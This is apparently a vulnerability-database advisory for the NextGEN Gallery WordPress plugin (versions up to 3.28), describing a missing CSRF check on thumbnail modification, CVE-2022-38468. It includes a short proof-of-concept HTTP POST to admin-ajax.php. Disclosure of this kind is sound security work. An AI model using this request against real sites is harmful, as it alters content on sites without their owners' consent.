NextGEN Gallery by Imagely

NextGEN Gallery by Imagely <= 3.28 - Thumbnail Modification via CSRF

LANACOMMONVDB ID: f963f9c9-0e35-4ffd-bd6d-125bb7d8ada5

The plugin does not have Cross-Site Request Forgery (CSRF) check when modify the thumbnail, which could allow attackers to make logged in users with the edit_post capability to perform such action via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=createNewThumb&id=1&x=10&y=10&h=10&w=10&rr=1

References

Source Code: https://wordpress.org/plugins/nextgen-gallery/

CVE: CVE-2022-38468

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-13

Published: 2023-02-14

Affected Version: <= 3.28

Classification

Type: Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]